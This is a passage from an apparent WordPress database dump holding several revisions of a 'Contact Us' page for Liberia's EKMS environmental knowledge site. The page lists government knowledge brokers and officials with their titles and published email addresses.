loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:41:29','2021-01-22 11:41:29','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3423,42,'2021-01-22 11:43:06','2021-01-22 11:43:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:43:06','2021-01-22 11:43:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3424,42,'2021-01-22 11:43:06','2021-01-22 11:43:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director<br />NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager<br />NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />Monitoring, Control, and Surveillance Field Officer<br />NaFAA</p><p><strong>Joyce Kumeh</strong><br />Small Scale Fisheries Officer<br />NaFAA</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 11:43:06','2021-01-22 11:43:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3425,42,'2021-01-22 11:43:06','2021-01-22 11:43:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" 